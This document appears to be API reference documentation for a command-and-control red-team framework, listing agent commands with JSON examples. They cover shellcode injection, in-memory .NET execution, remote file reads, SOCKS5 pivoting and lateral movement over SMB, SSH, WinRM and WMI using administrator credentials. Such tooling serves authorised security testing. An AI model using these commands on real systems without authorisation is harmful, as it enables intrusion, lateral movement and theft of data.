Plugin commands

List of default plugin commands, with their configuration and examples.

connect-tcp

Used along with the "Relay Agent Bind TCP listener" listener. An agent created and executed with that listener waits for connections initiated via the connect-tcp command.

Parameters:

  • host: IP or domain name where the waiting agent was executed
  • port: Port on which the waiting agent is listening

Example(POST content)

{
  "template": "connect-tcp",
  "configuration": {
    "host": "192.168.12.12",
    "port": 8888
  }
}

execute-assembly

Executes a .NET executable in memory

Parameters:

  • executable: .NET executable file content (if provided via API, it has to be base64 encoded)
  • parameters: Parameters passed to the .NET executable as command line arguments

Example(POST content)

{
  "template": "execute-assembly",
  "configuration": {
    "executable": "{SHARPUP executable in base64}",
    "parameters": ["audit"]
  }
}

fs-delete

This command deletes a file in the agent filesystem

Parameters:

  • filepath: Path of the file to delete (environment variables are supported)

Example(POST content)

{
  "template": "fs-delete",
  "configuration": {
    "filepath": "c:\\some\\dir\\to_delete.txt"
  }
}

fs-read

This command reads and returns a file from the agent filesystem

Parameters:

  • filepath: Path of the file to read (environment variables are supported)

Example(POST content)

{
  "template": "fs-read",
  "configuration": {
    "filepath": "c:\\some\\dir\\s3cr3t.txt"
  }
}

fs-write

This command writes a file to the agent filesystem

Parameters:

  • filepath: Path of the file being written (environment variables are supported)
  • data: Content of the file (if provided via API, it has to be base64 encoded)

Example(POST content)

{
  "template": "fs-write",
  "configuration": {
    "filepath": "c:\\some\\dir\\hello.txt",
    "data": "SEVMTE8gV09STEQ="
  }
}

inject

Injects and executes shellcode

Parameters:

  • shellcode: Shellcode to execute (if provided via API, it has to be base64 encoded)

Example(POST content)

{
  "template": "inject",
  "configuration": {
    "shellcode": "{some type of shellcode in base64}"
  }
}

jump-service

Command for lateral movement. You can copy a file to the target machine over SMB and then create and start a service pointing to that file or to any other executable

Parameters:

  • payloadId: Payload used in the jump (should be a service exe)
  • copyMethod: Method used for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • servicePath: Path of the created service
  • serviceName: Name of the created service
  • serviceDisplayName: Display name of the created service
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

{
  "template": "jump-service",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_service.exe",
    "target": "target-machine",
    "servicePath": "c:\\new_service.exe",
    "serviceName": "new-service",
    "serviceDisplayName": "New service",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-ssh

Command for lateral movement. You can copy a file to the target machine over SMB and then run it or any command over SSH

Parameters:

  • payloadId: Payload used in the jump (should be an executable exe)
  • copyMethod: Method used for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • cmdline: Command line to run on the target machine
  • username: Username to use for copy and jump
  • password: Password to use for copy and jump
  • privateKeyPassword: Password of the private key file

Example(POST content)

{
  "template": "jump-ssh",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-winrm

Command for lateral movement. You can copy a file to the target machine over SMB and then run it or any PowerShell command over Windows Remote Management

Parameters:

  • payloadId: Payload used in the jump (should be an executable exe)
  • copyMethod: Method used for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • executablePath: Path of the executable to run
  • customPowershell: Custom PowerShell to run
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

{
  "template": "jump-winrm",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "executablePath": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-wmi

Command for lateral movement. You can copy a file to the target machine over SMB and then run it or any command over Windows Management Instrumentation

Parameters:

  • payloadId: Payload used in the jump (should be an executable exe)
  • copyMethod: Method used for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • cmdline: Command line to run on the target machine
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

{
  "template": "jump-wmi",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

procinfo

Returns additional information about the agent's process

Parameters: None

Example(POST content)

{
  "template": "procinfo",
  "configuration": {}
}

screenshot

Takes a screenshot on the target machine and returns the picture

Parameters: None

Example(POST content)

{
  "template": "screenshot",
  "configuration": {}
}

socks5

Creates a SOCKS5 proxy into the agent network

Parameters:

  • port: Port that the C2 opens for the user to use as a SOCKS5 proxy

Example(POST content)

{
  "template": "socks5",
  "configuration": {
    "port": "8765"
  }
}

spawn

Spawns a new agent

Parameters:

  • listenerId: Which listener the agent will connect to
  • payloadType: Type of the payload
  • encryptedCommunication: Whether communication should be encrypted

Example(POST content)

{
  "template": "spawn",
  "configuration": {
    "listenerId": "1",
    "payloadType": "WINDOWS_X64_STAGELESS",
    "encryptedCommunication": true
  }
}